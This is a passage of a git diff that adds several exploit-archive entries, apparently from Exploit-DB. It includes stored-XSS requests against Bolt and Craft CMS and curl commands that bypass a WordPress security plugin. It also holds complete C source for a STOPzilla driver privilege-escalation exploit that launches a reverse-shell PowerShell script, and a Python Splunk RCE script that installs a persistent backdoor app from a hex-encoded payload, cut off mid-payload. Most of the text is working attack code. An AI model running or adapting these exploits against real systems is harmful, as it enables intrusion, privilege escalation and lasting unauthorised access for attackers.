+content_edit%5B_token%5D=u1EA_Zhor_EwrIyqIt-PLLK02DccGgZDDWFQm1325_8&editreferrer=&contenttype=pages&title=%22%3E%3Cscript%3Ealert%28%22ismailtasdelen%22%29%3C%2Fscript%3E&slug=script-alert-ismailtasdelen-script&image%5Bfile%5D=2019-03%2Fimg-src-x-onerror-prompt-1-.png&files%5B%5D=&teaser=%3Cp%3EBolt+3.6.4+CMS%3C%2Fp%3E%0D%0A&body=%3Cp%3EBolt+3.6.4+CMS%3C%2Fp%3E%0D%0A&template=&taxonomy%5Bgroups%5D%5B%5D=&taxonomy-order%5Bgroups%5D=0&id=&status=draft&datepublish=2019-03-04+08%3A24%3A47&datedepublish=&ownerid=1&_live-editor-preview=&content_edit%5Bsave%5D=1 \ No newline at end of file diff --git a/exploits/php/webapps/46496.txt b/exploits/php/webapps/46496.txt new file mode 100644 index 000000000..1e043e941 --- /dev/null +++ b/exploits/php/webapps/46496.txt @@ -0,0 +1,31 @@ +# Exploit Title: Craft CMS 3.1.12 Pro - Cross-Site Scripting +# Date: 2019-03-04 +# Exploit Author: Ismail Tasdelen +# Vendor Homepage: https://craftcms.com/ +# Software Link : https://github.com/craftcms/cms +# Software : Craft CMS 3.1.12 Pro +# Version : 3.1.12 Pro +# Vulernability Type : Cross-site Scripting +# Vulenrability : Stored XSS +# CVE : CVE-2019-9554 + +# In the 3.1.12 Pro version of the Craft CMS web application, the XSS vulnerability has been discovered +# in the header insertion field when adding source code. + +# HTTP POST Request : + +POST /XXX/s/admin/entries/news/258-craft-cms-3-1-12-pro-xss-test HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:65.0) Gecko/20100101 Firefox/65.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: https://localhost/XXX/s/admin/entries/news/258-craft-cms-3-1-12-pro-xss-test +Content-Type: application/x-www-form-urlencoded +Content-Length: 1936 +DNT: 1 +Connection: close +Cookie: CraftSessionId=2ea7nf0jqr0dtl3ioesmlpibfn; CRAFT_CSRF_TOKEN=deccdc1b2ef00dd8580186987fe54e3cdf92305c6150cffb523f392540a2d4aba%3A2%3A%7Bi%3A0%3Bs%3A16%3A%22CRAFT_CSRF_TOKEN%22%3Bi%3A1%3Bs%3A208%3A%22iuw8Yd67pzxgeP7PrY9zqL5nYEB0Uor6JeS779fM%7Cf42be7b0c353ba14582c1e682a6150947da39c970d31f5cbc3ddc4c0bbe14608iuw8Yd67pzxgeP7PrY9zqL5nYEB0Uor6JeS779fM%7C1%7C%242a%2413%245j8bSRoKQZipjtIg6FXWR.kGRR3UfCL.QeMIt2yTRH1.hCNHLQKtq%22%3B%7D; 1031b8c41dfff97a311a7ac99863bdc5_identity=9804f2668edfba25525881f3badabcfe5adb1d71f4dcb4504daee11a78bc94a3a%3A2%3A%7Bi%3A0%3Bs%3A41%3A%221031b8c41dfff97a311a7ac99863bdc5_identity%22%3Bi%3A1%3Bs%3A197%3A%22%5B%221%22%2C%22%5B%5C%22dQCnIq3FbN0KsbTg8nbPQxV3JvEWqbBzqXjf0nwbvJDN0LjgArYGZe4WaYfo3AiYzm8CaeKPjT9CUw_8mnAd_D89-nf39hYXRRoq%5C%22%2Cnull%2C%5C%22Mozilla%2F5.0+%28X11%3B+Linux+x86_64%3B+rv%3A65.0%29+Gecko%2F20100101+Firefox%2F65.0%5C%22%5D%22%2C3600%5D%22%3B%7D; 1031b8c41dfff97a311a7ac99863bdc5_username=53dcb198f73d427f239351d0c5ac1bb1e4fbba88fab3cc128854b0232098896da%3A2%3A%7Bi%3A0%3Bs%3A41%3A%221031b8c41dfff97a311a7ac99863bdc5_username%22%3Bi%3A1%3Bs%3A5%3A%22admin%22%3B%7D +Upgrade-Insecure-Requests: 1 + +CRAFT_CSRF_TOKEN=dgLN-H1XWhJgLIiYSYl52Z4wVJZttVH_wDyF9k5Bi00GXCSSTri7oLF9innUOlavPu4AhcUUuEoHMpGSl7-GbdK9oBrDQT5p3BN2frKMuzd6IgTMdbWhgSXqx6pj4hV1UyLi8rZBnAqaMQT1eP_1_4X0fqZYp5Q4GfmlV7iq26NdVxnY_X03CauMkmElBmRoa-6A_U8FGYjg2ipWdesOvZa18UZsUHMNWUWBmYzHJc-82MSRtiZ19DS1iTzV74nlnSaY3vva5oBQFEDtnwZhqR93usAkM2wlEFbw_yzZTonsaW3sHPlkkZl5x8YbLvl7TDl3pXmB3e3NG75Ltl9hzQ6NM7D2dtl7MwepoPSO41vqj8Es8nQOUOgkEh-BtdgOTRJg_0TTlOJHifTOB4EhFmNAgJeHdao6olhxgkCmkcmyhATeP8LED0mL_G7C25eWMw5cms0oWHudxvcyEjFdDiaSsYFrN3is0ekOYx_TbO7E2roXNjkDZy0M5q_Kn3KdkrODw-QVIJJ3-adtsKLAka9fzIyz68joE1oIoc5NFdg%3D&action=entries%2Fsave-entry&redirect=ac40ade69b3fe7bc96c8157907aae4128d2b64f411148be4af2141edea85b42fentries%2Fnews§ionId=2&entryId=258&title=Craft+CMS+3.1.12+Pro+-+XSS+TEST&fields%5BfeaturedEntry%5D=&fields%5BfeaturedImage%5D=&fields%5BshortDescription%5D=%3Cp%3ECraft+CMS+3.1.12+Pro+-+XSS+TEST%3C%2Fp%3E&fields%5Bheading%5D=Craft+CMS+3.1.12+Pro+-+XSS+TEST&fields%5Bsubheading%5D=Craft+CMS+3.1.12+Pro+-+XSS+TEST&fields%5BarticleBody%5D=&fields%5BarticleBody%5D%5B259%5D%5Btype%5D=text&fields%5BarticleBody%5D%5B259%5D%5Benabled%5D=1&fields%5BarticleBody%5D%5B259%5D%5Bfields%5D%5Btext%5D=%3Cfigure%3E%3Ca+href%3D%22%22%3E%3Cimg+src%3D%22https%3A%2F%2Fdemo.craftcms.com%2F3Rdj0OGqru%2Fs%2Fassets%2Fsite%2F-.png%23asset%3A257%3Aurl%22+alt%3D%22%26quot%3B%3Ealert%28%26quot%3Bismailtasdelen%26quot%3B%29%22+title%3D%22%26quot%3B%3Ealert%28%26quot%3Bismailtasdelen%26quot%3B%29%22+data-image%3D%228ilh6edpse56%22%3E%3C%2Fa%3E%3Cfigcaption%3E%22%26gt%3B%3C%2Ffigcaption%3E%3C%2Ffigure%3E&fields%5BarticleBody%5D%5B259%5D%5Bfields%5D%5Bposition%5D=left&typeId=2&slug=craft-cms-3-1-12-pro-xss-test&author=&author%5B%5D=1&postDate%5Bdate%5D=3%2F4%2F2019&postDate%5Btimezone%5D=UTC&postDate%5Btime%5D=8%3A55+AM&postDate%5Btimezone%5D=UTC&expiryDate%5Bdate%5D=&expiryDate%5Btimezone%5D=UTC&expiryDate%5Btime%5D=&expiryDate%5Btimezone%5D=UTC&enabled=1&revisionNotes= \ No newline at end of file diff --git a/exploits/php/webapps/46497.txt b/exploits/php/webapps/46497.txt new file mode 100644 index 000000000..57292aeb1 --- /dev/null +++ b/exploits/php/webapps/46497.txt @@ -0,0 +1,65 @@ +# Exploit Title: WordPress Cerber Security, Antispam & Malware Scan - Multiple Bypass Vulnerabilities +# Type: WordPress Plugin +# Date: 2019-03-04 +# Active installs: 100,000+ +# Version: 8.0 +# Software Link: https://wordpress.org/plugins/wp-cerber/ +# Exploit Author: ed0x21son +# Category: WebApps, WordPress +# Tested on: Linux/WordPress 5.1 + +[Vulnerabilities] + + +#1: Stop user enumeration bypass: + +U can bypass user enumeration protection if u use Post method instead of Get. + +curl http://localhost/ -d author=1 + + + +#2: Protect admin scripts bypass: + +U can bypass admin scripts protection if u add one or more slashes to the uri. + +curl 'http://localhost/wp-admin///load-scripts.php?load%5B%5D=jquery-core,jquery-migrate,utils' +curl 'http://localhost/wp-admin///load-styles.php?load%5B%5D=dashicons,admin-bar' + + + +#3: Protects wp-login.php, wp-signup.php and wp-register.php from attacks bypass: + +U can bypass this protection if u encode any character in the uri. + +curl http://localhost/wp-login%2ephp +curl -v http://localhost/wp-signup%2ephp +curl -v http://localhost/wp-register%2ephp + + + +#4: Hide login URL bypass: + +U can bypass if u encode any character in the uri, Cerber will return the secret slug in the Location header field. + +curl -I http://localhost/wp-%61dmin/ + + + +#5: Stop user enumeration via REST API bypass: + +U can bypass if u insert /index.php/ between domain and rest route. + +curl http:/localhost/index.php/wp-json/wp/v2/users/ + + + +#6: Disable REST API bypass: + +Same above. + +curl http:/localhost/index.php/wp-json/wp/v2/ + + + +--ed0x21son \ No newline at end of file diff --git a/exploits/windows/dos/46485.html b/exploits/windows/dos/46485.html new file mode 100644 index 000000000..1ecb577c3 --- /dev/null +++ b/exploits/windows/dos/46485.html @@ -0,0 +1,184 @@ + + \ No newline at end of file diff --git a/exploits/windows/local/45496.c b/exploits/windows/local/45496.c new file mode 100644 index 000000000..bbb9534d7 --- /dev/null +++ b/exploits/windows/local/45496.c @@ -0,0 +1,448 @@ +/* +3y3t3m th!s - Ivan Ivanovic Ivanov Иван-дурак +недействительный 31337 Team + +clone of https://www.exploit-db.com/exploits/45401 + +deb yaaaa +win7 narrrr (fails) + +ch@ng3 p@yl0@d!!!!!!!!!!!!! +*/ + +#include +#include +#include +#include + +#pragma comment(lib,"winsta.lib") +#pragma comment(lib,"advapi32.lib") + +#define SystemHandleInformation 16 +#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xc0000004L) +#define STATUS_SUCCESS ((NTSTATUS)0x00000000L) + +typedef unsigned __int64 QWORD; + + +typedef struct _SID_BUILTIN +{ + UCHAR Revision; + UCHAR SubAuthorityCount; + SID_IDENTIFIER_AUTHORITY IdentifierAuthority; + ULONG SubAuthority[2]; +} SID_BUILTIN, *PSID_BUILTIN; + + +typedef struct _SID_INTEGRITY +{ + UCHAR Revision; + UCHAR SubAuthorityCount; + SID_IDENTIFIER_AUTHORITY IdentifierAuthority; + ULONG SubAuthority[1]; +} SID_INTEGRITY, *PSID_INTEGRITY; + + +typedef NTSYSAPI NTSTATUS (NTAPI *_ZwCreateToken)( + OUT PHANDLE TokenHandle, + IN ACCESS_MASK DesiredAccess, + IN POBJECT_ATTRIBUTES ObjectAttributes, + IN TOKEN_TYPE Type, + IN PLUID AuthenticationId, + IN PLARGE_INTEGER ExpirationTime, + IN PTOKEN_USER User, + IN PTOKEN_GROUPS Groups, + IN PTOKEN_PRIVILEGES Privileges, + IN PTOKEN_OWNER Owner, + IN PTOKEN_PRIMARY_GROUP PrimaryGroup, + IN PTOKEN_DEFAULT_DACL DefaultDacl, + IN PTOKEN_SOURCE Source +); + +typedef NTSTATUS (WINAPI *_NtQuerySystemInformation)( + ULONG SystemInformationClass, + PVOID SystemInformation, + ULONG SystemInformationLength, + PULONG ReturnLength); + + + +int GetWindowsVersion() +{ + int ver = 0; + OSVERSIONINFO osvi; + + + ZeroMemory(&osvi, sizeof(OSVERSIONINFO)); + osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO); + + GetVersionEx(&osvi); + + if (osvi.dwMajorVersion == 6 && osvi.dwMinorVersion == 1) ver = 1; // Windows 7 + if (osvi.dwMajorVersion == 6 && osvi.dwMinorVersion == 2) ver = 2; // Windows 10 + + return ver; +} + +int AddAccountToAdminGroup(HANDLE hTokenElevated) +{ + STARTUPINFO si; + PROCESS_INFORMATION pi; + DWORD currentusersize; + char currentuser[100]; + char netcommand[15000]; + + + ZeroMemory(&si, sizeof(STARTUPINFO)); + ZeroMemory(&pi, sizeof(PROCESS_INFORMATION)); + si.cb = sizeof(STARTUPINFO); + + currentusersize = sizeof(currentuser); + + if (!GetUserName(currentuser, ¤tusersize)) + { + printf("\n[-] Failed to obtain current username: %d\n\n", GetLastError()); + return -1; + } + + printf("\n[*] Creating new process..."); + // The command or binary file to be executed can be changed here + sprintf(netcommand, "powershell.exe .\\rev.ps1"); + + if (!CreateProcessAsUser(hTokenElevated, NULL, netcommand, NULL, NULL, FALSE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi)) + { + printf("\n[-] Failed to execute command (%d) Run exploit again\n\n", GetLastError()); + return -1; + } + printf("\n[+] Executed command successfully\n"); + + return 0; +} + + + +PTOKEN_PRIVILEGES SetPrivileges() +{ + PTOKEN_PRIVILEGES privileges; + LUID luid; + int NumOfPrivileges = 5; + int nBufferSize; + + + nBufferSize = sizeof(TOKEN_PRIVILEGES) + sizeof(LUID_AND_ATTRIBUTES) * NumOfPrivileges; + privileges = (PTOKEN_PRIVILEGES) LocalAlloc(LPTR, nBufferSize); + + privileges->PrivilegeCount = NumOfPrivileges; + + LookupPrivilegeValue(NULL, SE_TCB_NAME, &luid); + privileges->Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; + privileges->Privileges[0].Luid = luid; + + LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &luid); + privileges->Privileges[1].Attributes = SE_PRIVILEGE_ENABLED; + privileges->Privileges[1].Luid = luid; + + LookupPrivilegeValue(NULL, SE_ASSIGNPRIMARYTOKEN_NAME, &luid); + privileges->Privileges[2].Attributes = SE_PRIVILEGE_ENABLED; + privileges->Privileges[2].Luid = luid; + + LookupPrivilegeValue(NULL, SE_TAKE_OWNERSHIP_NAME, &luid); + privileges->Privileges[3].Attributes = SE_PRIVILEGE_ENABLED; + privileges->Privileges[3].Luid = luid; + + LookupPrivilegeValue(NULL, SE_IMPERSONATE_NAME, &luid); + privileges->Privileges[4].Attributes = SE_PRIVILEGE_ENABLED; + privileges->Privileges[4].Luid = luid; + + return privileges; +} + + + +PSID GetLocalSystemSID() +{ + PSID psid = NULL; + SID_IDENTIFIER_AUTHORITY sidAuth = SECURITY_NT_AUTHORITY; + + + if (AllocateAndInitializeSid(&sidAuth, 1, SECURITY_LOCAL_SYSTEM_RID, 0, 0, 0, 0, 0, 0, 0, &psid) == FALSE) + { + printf("\n[-] AllocateAndInitializeSid failed %d\n", GetLastError()); + return NULL; + } + + return psid; +} + + + +LPVOID GetInfoFromToken(HANDLE hToken, TOKEN_INFORMATION_CLASS type) +{ + DWORD dwLengthNeeded; + LPVOID lpData = NULL; + + + if (!GetTokenInformation(hToken, type, NULL, 0, &dwLengthNeeded) && GetLastError() != ERROR_INSUFFICIENT_BUFFER) + { + printf("\n[-] Failed to initialize GetTokenInformation %d", GetLastError()); + return NULL; + } + + lpData = (LPVOID)LocalAlloc(LPTR, dwLengthNeeded); + GetTokenInformation(hToken, type, lpData, dwLengthNeeded, &dwLengthNeeded); + + return lpData; +} + + + +QWORD TokenAddressCurrentProcess(HANDLE hProcess, DWORD MyProcessID) +{ + _NtQuerySystemInformation NtQuerySystemInformation; + PSYSTEM_HANDLE_INFORMATION pSysHandleInfo; + ULONG i; + PSYSTEM_HANDLE_ENTRY pHandle; + QWORD TokenAddress = 0; + DWORD nSize = 4096; + DWORD nReturn; + BOOL tProcess; + HANDLE hToken; + + + if ((tProcess = OpenProcessToken(hProcess, TOKEN_QUERY, &hToken)) == FALSE) + { + printf("\n[-] OpenProcessToken() failed (%d)\n", GetLastError()); + return -1; + } + + NtQuerySystemInformation = (_NtQuerySystemInformation)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQuerySystemInformation"); + + if (!NtQuerySystemInformation) + { + printf("[-] Unable to resolve NtQuerySystemInformation\n\n"); + return -1; + } + + do + { + nSize += 4096; + pSysHandleInfo = (PSYSTEM_HANDLE_INFORMATION) HeapAlloc(GetProcessHeap(), 0, nSize); + } while (NtQuerySystemInformation(SystemHandleInformation, pSysHandleInfo, nSize, &nReturn) == STATUS_INFO_LENGTH_MISMATCH); + + printf("\n[i] Current process id %d and token handle value %u", MyProcessID, hToken); + + for (i = 0; i < pSysHandleInfo->Count; i++) + { + + if (pSysHandleInfo->Handle[i].OwnerPid == MyProcessID && pSysHandleInfo->Handle[i].HandleValue == hToken) + { + TokenAddress = pSysHandleInfo->Handle[i].ObjectPointer; + } + } + + HeapFree(GetProcessHeap(), 0, pSysHandleInfo); + return TokenAddress; +} + + + +HANDLE CreateUserToken(HANDLE hToken) +{ + _ZwCreateToken ZwCreateToken; + HANDLE hTokenElevated; + NTSTATUS status; + int i; + DWORD dwSize = 0; + TOKEN_USER userToken; + PTOKEN_PRIVILEGES privileges = NULL; + PTOKEN_OWNER ownerToken = NULL; + PTOKEN_GROUPS groups = NULL; + PTOKEN_PRIMARY_GROUP primary_group = NULL; + PTOKEN_DEFAULT_DACL default_dacl = NULL; + PLUID pluidAuth; + LARGE_INTEGER li; + PLARGE_INTEGER pli; + LUID authid = SYSTEM_LUID; + LUID luid; + PSID_AND_ATTRIBUTES pSid; + SID_BUILTIN TkSidLocalAdminGroup = { 1, 2, { 0, 0, 0, 0, 0, 5 }, { 32, DOMAIN_ALIAS_RID_ADMINS } }; + SECURITY_QUALITY_OF_SERVICE sqos = { sizeof(sqos), SecurityImpersonation, SECURITY_STATIC_TRACKING, FALSE }; + OBJECT_ATTRIBUTES oa = { sizeof(oa), 0, 0, 0, 0, &sqos }; + TOKEN_SOURCE SourceToken = { { '!', '!', '!', '!', '!', '!', '!', '!' }, { 0, 0 } }; + SID_IDENTIFIER_AUTHORITY nt = SECURITY_NT_AUTHORITY; + PSID lpSidOwner = NULL; + SID_INTEGRITY IntegritySIDSystem = { 1, 1, SECURITY_MANDATORY_LABEL_AUTHORITY, SECURITY_MANDATORY_SYSTEM_RID }; + + + ZwCreateToken = (_ZwCreateToken)GetProcAddress(LoadLibraryA("ntdll.dll"), "ZwCreateToken"); + + if (ZwCreateToken == NULL) + { + printf("[-] Unable to resolve ZwCreateToken: %d\n\n", GetLastError()); + return NULL; + } + + groups = (PTOKEN_GROUPS)GetInfoFromToken(hToken, TokenGroups); + primary_group = (PTOKEN_PRIMARY_GROUP)GetInfoFromToken(hToken, TokenPrimaryGroup); + default_dacl = (PTOKEN_DEFAULT_DACL)GetInfoFromToken(hToken, TokenDefaultDacl); + + pSid = groups->Groups; + + for (i=0; iGroupCount; i++, pSid++) + { + PISID piSid = (PISID)pSid->Sid; + + if (pSid->Attributes & SE_GROUP_INTEGRITY) + { + memcpy(pSid->Sid, &IntegritySIDSystem, sizeof(IntegritySIDSystem)); + } + + if (piSid->SubAuthority[piSid->SubAuthorityCount - 1] == DOMAIN_ALIAS_RID_USERS) + { + memcpy(piSid, &TkSidLocalAdminGroup, sizeof(TkSidLocalAdminGroup)); // Found RID_USERS membership, overwrite with RID_ADMINS + pSid->Attributes = SE_GROUP_ENABLED; + } + else + { + pSid->Attributes &= ~SE_GROUP_USE_FOR_DENY_ONLY; + pSid->Attributes &= ~SE_GROUP_ENABLED; + } + } + + pluidAuth = &authid; + li.LowPart = 0xFFFFFFFF; + li.HighPart = 0xFFFFFFFF; + pli = &li; + + AllocateAndInitializeSid(&nt, 1, SECURITY_LOCAL_SYSTEM_RID, 0, 0, 0, 0, 0, 0, 0, &lpSidOwner); + userToken.User.Sid = lpSidOwner; + userToken.User.Attributes = 0; + + AllocateLocallyUniqueId(&luid); + SourceToken.SourceIdentifier.LowPart = luid.LowPart; + SourceToken.SourceIdentifier.HighPart = luid.HighPart; + + ownerToken = (PTOKEN_OWNER) LocalAlloc(LPTR, sizeof(PSID)); + ownerToken->Owner = GetLocalSystemSID(); + + privileges = SetPrivileges(); + + status = ZwCreateToken(&hTokenElevated, + TOKEN_ALL_ACCESS, + &oa, + TokenPrimary, + pluidAuth, + pli, + &userToken, + groups, + privileges, + ownerToken, + primary_group, + default_dacl, + &SourceToken); + + if (status == STATUS_SUCCESS) + { + printf("\n[+] New token created successfully\n"); + return hTokenElevated; + } + else + { +// printf("\n[-] Failed to create new token %08x\n", status); + return NULL; + } + + if (lpSidOwner) FreeSid(lpSidOwner); + if (groups) LocalFree(groups); + if (privileges) LocalFree(privileges); + if (primary_group) LocalFree(primary_group); + if (default_dacl) LocalFree(default_dacl); + if (ownerToken) { if(ownerToken->Owner) FreeSid(ownerToken->Owner); LocalFree(ownerToken); } + + return NULL; +} + + + +int main(int argc, char *argv[]) +{ + + QWORD TokenAddressTarget; + QWORD SepPrivilegesOffset = 0x40; + QWORD PresentByteOffset; + QWORD EnableByteOffset; + QWORD TokenAddress; + HANDLE hDevice; + char devhandle[MAX_PATH]; + DWORD dwRetBytes = 0; + HANDLE hTokenCurrent; + HANDLE hTokenElevate; + + + printf("-------------------------------------------------------------------------------\n"); + printf(" STOPzilla AntiMalware (szkg64.sys) Arbitrary Write EoP Exploit \n"); + printf(" Tested on 64bit Windows 7 / Windows 10 (1803) \n"); + printf("-------------------------------------------------------------------------------\n"); + + TokenAddress = TokenAddressCurrentProcess(GetCurrentProcess(), GetCurrentProcessId()); + printf("\n[i] Address of current process token 0x%p", TokenAddress); + + TokenAddressTarget = TokenAddress + SepPrivilegesOffset; + printf("\n[i] Address of _SEP_TOKEN_PRIVILEGES 0x%p will be overwritten\n", TokenAddressTarget); + + PresentByteOffset = TokenAddressTarget + 0x0; + printf("[i] Present bits at 0x%p will be overwritten\n", PresentByteOffset); + + EnableByteOffset = TokenAddressTarget + 0x8; + printf("[i] Enabled bits at 0x%p will be overwritten", EnableByteOffset); + + sprintf(devhandle, "\\\\.\\%s", "msprocess"); + + hDevice = CreateFile(devhandle, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL); + + if(hDevice == INVALID_HANDLE_VALUE) + { + printf("\n[-] Open %s device failed\n\n", devhandle); + return -1; + } + else + { + printf("\n[+] Open %s device successful", devhandle); + } + + + if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &hTokenCurrent)) + { + printf("[-] Failed OpenProcessToken() %d\n\n", GetLastError()); + return NULL; + } + printf("[+] OpenProcessToken() handle opened successfully"); + + do + { + printf("\n[*] Overwriting _SEP_TOKEN_PRIVILEGES bits"); + DeviceIoControl(hDevice, 0x80002063, NULL, 0, (LPVOID)PresentByteOffset, 0, &dwRetBytes, NULL); + DeviceIoControl(hDevice, 0x80002063, NULL, 0, (LPVOID)EnableByteOffset, 0, &dwRetBytes, NULL); + hTokenElevate = CreateUserToken(hTokenCurrent); + Sleep(500); + } while (hTokenElevate == NULL); + + if (GetWindowsVersion() == 1) + { + printf("[i] Running Windows 7"); + printf("\n[*] Exploit will NOT be run!"); + } + if (GetWindowsVersion() == 2) + { + printf("[i] Running Windows 10"); + AddAccountToAdminGroup(hTokenElevate); + } + else if (GetWindowsVersion() == 0) + { + printf("[i] Exploit not tested on this OS\n\n"); + } + + CloseHandle(hDevice); + + return 0; +} \ No newline at end of file diff --git a/exploits/windows/webapps/46487.py b/exploits/windows/webapps/46487.py new file mode 100755 index 000000000..4d695651f --- /dev/null +++ b/exploits/windows/webapps/46487.py @@ -0,0 +1,150 @@ +#!/usr/bin/python + +# Exploit Title: Splunk Enterprise 7.2.4 Custom App RCE (persistent backdoor - custom binary payload) +# Date: March 1, 2019 +# Exploit Author: Matteo Malvica +# Original Author: Lee Mazzoleni +# Vendor Homepage: https://www.splunk.com/ +# Software Link: https://www.splunk.com/en_us/download/splunk-enterprise.html +# Version: 7.2.4 +# Tested on: kali 4.18.0-kali2-amd64 +# CVE : n/a + +# NOTES: Due to python interoperability issue on CentOS, I have upgraded the exploit to +# support any kind of binary or payload so the exploit does not have to rely on any python libraries + +from selenium import webdriver +from selenium.webdriver.common.keys import Keys +from time import sleep +from sys import stdout,argv +from os import getcwd,path,system +from subprocess import Popen +import os +import stat +import binascii + +# Download and unpack the correct version for your OS from here: github.com/mozilla/geckodriver/releases +gecko_driver_path = '/root/Desktop/geckodriver' + +def checkLogin(url): + if '/login' not in url and '/logout' not in url: + print 'Login successful!' + else: + print 'Login failed! Aborting...' + exit() + + +def checkUrl(url): + if '_upload' not in url: + print '[-] Navigation error, aborting...' + exit() + + +def exploit(splunk_target_url, splunk_admin_user, splunk_admin_pass): + print '[+] Starting bot ...' + profile = webdriver.FirefoxProfile() + profile.accept_untrusted_certs = True + driver = webdriver.Firefox(firefox_profile=profile, executable_path=gecko_driver_path) + + print '[*] Loading the target page ...' + driver.get(splunk_target_url) + sleep(1) + + stdout.write('[*] Attempting to log in with the provided credentials ... ') + username_field = driver.find_element_by_name("username") + username_field.clear() + username_field.send_keys(splunk_admin_user) + sleep(1) + + pw_field = driver.find_element_by_name("password") + pw_field.clear() + pw_field.send_keys(splunk_admin_pass) + pw_field.send_keys(Keys.RETURN) + sleep(3) + + current_url = driver.current_url + checkLogin(current_url) + + url = driver.current_url.split('/') + upload_url = url[0] + '//' + str(url[2]) + '/' + url[3] + '/manager/appinstall/_upload' + print '[*] Navigating to the uploads page ({}) ...'.format(upload_url) + driver.get(upload_url) + sleep(1) + + current_url = driver.current_url + checkUrl(current_url) + + form = driver.find_element_by_tag_name("form") + input = form.find_element_by_id("appfile") + input.send_keys(getcwd()+'/'+'splunk-shell.tar.gz') + force_update = driver.find_element_by_id("force") + force_update.click() + submit_button = driver.find_element_by_class_name("splButton-primary") + submit_button.click() + + print '[*] Your persistent shell has been successfully uploaded!' + print '[*] Be patient, this might take up to a minute...!' + driver.quit() + + +def generatePayload(shellcode): + # this hex decodes into the evil splunk app (tar.gz file) that we will be uploading as the payload + # after the app is written to disk, together with the provided custom shellcode. + # the app configuration sets it to be enabled upon installation (restarting splunk / manually enabling it is not required.) + # this is a PERSISTENT backdoor, there is no need to re-upload multiple times... the backdoor will reconnect every 10-20 seconds + + # CHANGED: the compressed app folder structure is loading a custom binary from inputs.conf + print '[*] Creating Splunk App...' + shell = '1f8b0800e229795c0003ed9c5b6fdbc81580a95c363283b65ea068b7401f06711749dc58e24da4ad34ad9dc44183a6dd20f2260b288a322247126b8a6449cab2374d11f407f4bddbd75efe47db97bef5adfd237def197264eb6ad95959c93ae703a42139c3b99d396766c8e1c4a1d7f577d7e236f3bca27436288a62954a2475cdcc553423730544d50dddd434c3d44ca2a8866ae812299d517e86e8c6098d202b1d9a242c981e0e82359bc7c423ca71e87e438807e55fa817ee57ea952488d83cd380fa300d63bafc556b40fea606f2371543958832cf4c4ce30397bf74f97b57a40b92f44b6a93cf2ae40b22e0d7a425f869f07b003f7ebecf6fe887d85c9e16e5d6cece1371b8dfbf0b793f19d6ffb3d0fe59faaf1a8a628ce87fc9d44aa8ff0b2277b7eba892c4d5392f65ee257972d0bcf88d7141b81ff1f8781c71d8f082069cfdab11ce3dc70882cc1baebb17a586e44a7ea337a8bf9e1b278af29fdc858b972e7f74259f97f3f2b7e45aa51df42a094dbaf15d1a55f9d9639ab41be2782708bcc363da78eab25e7df9bbf7023fa1aecfa2f466d76110e4f933d77782dedda0eb3b7175c0239f5fca2fd5973f79f54a2f29b788baa1bdbe455e59161c435ff1faf552fefb9faa771ebeec1c7cf9eab7af7ff7c7ac14b99c28ce77468af7d551f1f62a91ef057e4b4a8d95744572242635252a75254f4ace6be1478a39520997e15a20d9e0eb0d54c0fffa15f0df7e052cc95797ae7efbead27015d4977f2832fecc7592f60ef3b73db6c7fccfa247346173ab95c19aceaf6c36ff9d166e564de57f70fdc19317dddfffe1ab3ffdf92f7ffddbdfff3152591f8f54d63f87ab63a4a2ce25a260f9abef361b0882bc8770fb4084bb29dc37999b13fe17847b69e09e65e112e16e0af74de6e644b80bc2bd24dcbc7097854b84bb29dc37992b8c564e4c3e7222e59c98a1e4c4038a1c11eee6a98a8c201f0c17336799f7ffdbd3e7ff08829c637297ee57eedf95a6cf74785f4be0f7b27f8334792020c2f2aef813e9282c11eea670df642e0e0410044116cdd0fbbf86eb9fc51a90d3acffb00c85afffb05405d77f2c8221f93bac49bb5e32ef367042f96b9a6a6a4a89cbbf542a6928ff4530247f2fb0e919ac02e37217557352f96b8a89f25f0423f26fc567d001bc85fe2b16eaff4218923f0dc398457b2c9a6f2338bdfc4d552fa1fc17c190fc3b2ca10e4de89c6dc05be8bf85f67f314c967f3a1028f0d379a401f5611ed7ff5b9a35227fcb344c5cffb708aa60f38bae0fa503f90bb71e07ddc86675bbcdecddb8dba9c9d025c46ee0933bc42a68055dee044ee276189cab25a3b4a199d6ba52009d35d761a0a7c8f250acf09fb013c56115f40d5dd7b42c8e9a4c6d9bc53184881875489954c92aa9dd22bdc84d58ff5466fb61102510283e8813d6999dce7a492f6c94544b578ff2da75676710caa7140c553537cca31b3ddaf5a19ea29a1cf47c164160ea745cffa491e99abe7e145948ed5dda62c5b4e2ebcd20aa7743d047169f3873869295eac4f29facff622238270b0019328e5bffafebfab0fe6b60012cd4ff4570522d93ab611484713166bed3a1ae571c57bcbe02f84123700e64796565853c7db8fdacb2b3b5b35d2913be1e0c3ca30ef54817c6993189db41d773488311daf018490262431e20d5b84d23e6903d97f552eb1143fa472727ccf2bbaeda6f0453c6ffbca25d7b4ee3c0d38fff2c433370fcb7088e973f5cf05c1b0e03bf60c7f15ba631c3feeb9aa18dd87fcd3014b4ff8ba0b84aeeb5a9df02ebdb06331c86c40b5a0181110d2b1012b324bdde666eab9d147b7c6d2f81710939801122713b3058b945684c7ad07ab8cbc38614c28029e7c76908b25a940b10f3231ef12b997f3b96c55726861eeedf26e9a534ee325957e04a7aa10183a156c49700974937f26ef4dba4db6915e35d185c1e3eaeceda709d67bcdef0e0b642e8b76e4257b316b110fa13024d2a8bb3fe75226db9cdb1485fcb32d4e04e37f2090cce7891c5fd240c6297eb8debb748d04cbdae55d238c9e3a007d5eb5c1baa6a5e49599ac27ba0ba8aabab72f6d1dd2af9dcb7834e87f999609a81e7053d9e86e7fa2c26377a2ed4fe75c785a8e8c175c23b6d16252e8b6f72994087db4bef4b53e66966d113714399ac75822fd75c9fc7b6067563ef661577e82fbc1a3043dcbdcd2318cb609aef341bbd36ef8e13b69f1c7a9235d21d2c400cfebd805c3f92cb609e89dbe42dedba03a5db85d649862b302bc5485203851a103697f5b599c20eb37833a1